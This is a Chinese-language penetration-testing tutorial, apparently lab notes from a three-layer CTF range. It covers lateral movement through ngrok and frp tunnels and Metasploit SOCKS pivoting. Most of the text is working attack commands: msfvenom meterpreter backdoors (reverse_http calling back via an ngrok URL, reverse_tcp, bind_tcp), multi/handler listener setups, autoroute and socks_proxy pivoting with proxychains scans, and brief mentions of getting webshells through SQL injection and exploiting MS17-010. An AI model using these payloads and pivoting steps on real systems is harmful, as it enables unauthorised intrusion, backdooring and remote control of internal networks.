域横向内网漫游Socks代理隧道技术

必要基础知识点

1. 内网ip地址是私有ip地址（10.0.0.0/8, 172.16.0.0/12 , 192.168.0.0/16），除此之外就是外网ip
2. 两个不同的内网的主机想要通过CS或者MSF等工具实现控制或者通讯是不可能的，必须要借助代理
3. 正反向协议通信连接问题

• 正向：控制端主动去连接被控端
• 反向：被控端主动去连接控制端
• 为什么要区分正向和反向？–因为如果控制端是外网主机，被控端是内网主机，就相当于控制端有一个唯一的IP地址（比如103.12.4.11），通过这个IP地址就可以找到控制端，而在内网的被控端（比如192.168.23.36），你通过控制端主动去找是找不到的，因为这个内网IP地址并不是唯一的，可能很多内网都用了这个IP地址，你根本没法找。此时就需要反向连接了，让内网的被控端主动去找外网的控制端。

1. 内网穿透代理隧道技术说明

• 隧道主要解决流量分析工具、流量监控工具、防火墙等相关工具的过滤问题
• 代理主要解决网络的连通性问题

内网渗透-横向渗透-穿透-代理相关知识点

• 代理技术主要解决3种问题：内网有外网，内网有过滤（防火墙），内网无外网（单纯主机服务器，无网络）
• 代理主要分为：正向代理和反向代理（以下案例均有涉及）
• 代理相关工具：nps、frp、ngrok、reGeorg、sockscap65、earthworm、proxifier、proxychains
• 案例涉及工具：frp、ngrok、sockscap65、proxifier、proxychains
• nps、reGeorg工具：案例未涉及，可自行学习
• EarthWorm(简称EW)：已永久停止更新

内网穿透Ngrok测试演示-两个内网通讯上线

国外地址：https://ngrok.com/；国内地址：https://www.ngrok.cc/（国内版的现在打不开了，国内有一款花生壳应该也不错，可以试试）

我这里使用国外的

生成后门

msfvenom -p windows/meterpreter/reverse_http lhost=b6ff-117-181-162-169.ngrok-free.app lport=80 -f exe -o test1.exe

msf

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.70.128
set lport 4444
exploit

但是这里我一直没有成功

总结一下：使用内网穿透，如果选择是http服务就会给你生成一个随机的url，然后这个url对应你的电脑xxx端口，这样使用msf进行生成木马，如果对方点击这个木马，就会将木马的流量就会传输到这个url上，然后这个url又是映射的你电脑的xxx端口，这时候用msf进行监听就可以得到会话

内网穿透Frp自建跳板测试-两个内网通讯上线

• FRP说明文档：https://gofrp.org/docs/
• ngrok使用的是别人的服务器，容易泄露数据
• Frp工具：开源免费，自行搭建，方便修改，成本低，使用多样化，防止隐私泄露。而Ngrok工具使用的是别人的服务器，容易泄露隐私数据
• 服务端-下载-解压-修改-启动（阿里云主机记得修改安全组配置出入口）
• FRP下载地址：https://github.com/fatedier/frp/releases

服务器修改配置文件frps.ini

[common]
bind_port = 6677

启动服务端

./frps -c ./frps.ini

控制端修改配置文件

[common]
server_addr = 你的云主机ip
server_port = 6677 #frpc工作端口，必须和上面frps保持一致
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555 #转发给本机的5555
remote_port = 6000 #服务端用6000端口转发给本机

这里有一个需要注意的点就是服务器的上的防火墙，不仅要放行6677（我这里是6677）还需要放行6000，因为这两个端口都是服务器需要传输数据的

关闭frp的进程

ps -aux|grep frp| grep -v grep

CFS三层内网漫游安全测试演练-某CTF线下2019

第一步获取web服务器的权限，getshell—>提权

生成木马：

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.70.128 LPORT=4444 -f exe > 1.exe

msf连接：

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.70.128
set LPORT 4444
exploit

环境介绍

run get_local_subnets			#获取当前目标的网络接口

run autoroute -p				#查看路由地址

这里路由地址是空的

run autoroute -s 192.168.80.0/24				#添加路由地址

添加路由地址成功，说明在刚才反弹的session1会话上，我们添加了一个80网段的网络接口。此时我们就可以通过这个路由跟80网段进行通讯了。虽然能够通讯了，但是我们的目标是攻击target2，要攻击就需要使用到工具，由于路由是写到了maf建立的会话上面，有些工具没法用。此时我们就需要开一个代理，开这个代理就相当于开一个接口给其他人用

• 开启本地代理

use auxiliary/server/socks_proxy
set srvport 2222
set srvhost 0.0.0.0
exploit

• kali上配置proxychains（代理工具），修改/etc/proxychains.conf配置文件

#在配置文件中添加
socks4 192.168.70.128 2222       #攻击机的ip

proxychains nmap 192.168.80.0/24

调整了一下环境：

因为视屏中是老板，新版的msf在配置代理的时候默认的版本就是v5

所以这里在proxychains中以及浏览器中的代理协议也写v5就行了

目标2

至于怎么网站怎么拿shell就按照视屏中的来，首先在前端的源码中有一个路径提示sql注入，然后直接放到sqlmap中进行运行就行了，然后拿到网站权限之后再模板设置里面写入shell就行了

这里有一个工具的使用，就是有些shell工具是没有自带代理的功能的，那么SocksCap64代理就能解决这个问题

这里我就跳过这些步骤了，直接反弹一个shell到msf上

生成后门：msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=3333 -f exe > 2.exe		#视屏中使用的是linux的

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.80.147		#这里由于是正向连接，所以填写的是目标地址的ip
set LPORT 3333
exploit

这里简单说说为什么kali能够找到目标2，写一条路由通过目标1（因为目标1上有目标2的路由）作为跳板进行访问目标2，而目标2访问不了kali同样时因为没有路由，在真实情况下也有可能是目标不出网

拿到shell

• 信息收集及配置访问

#获取网络接口
run get_local_subnets
#查看路由地址
run autoroute -p
#添加路由地址
run autoroute -s 192.168.1.0/24

目标3

这里视频中的靶场是有一个MS17010的漏洞，然后进行利用的，我这里就直接上传一个后门看能不能进行正常连接吧

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.1.12		#这里由于是正向连接，所以填写的是目标地址的ip
set LPORT 3333
exploit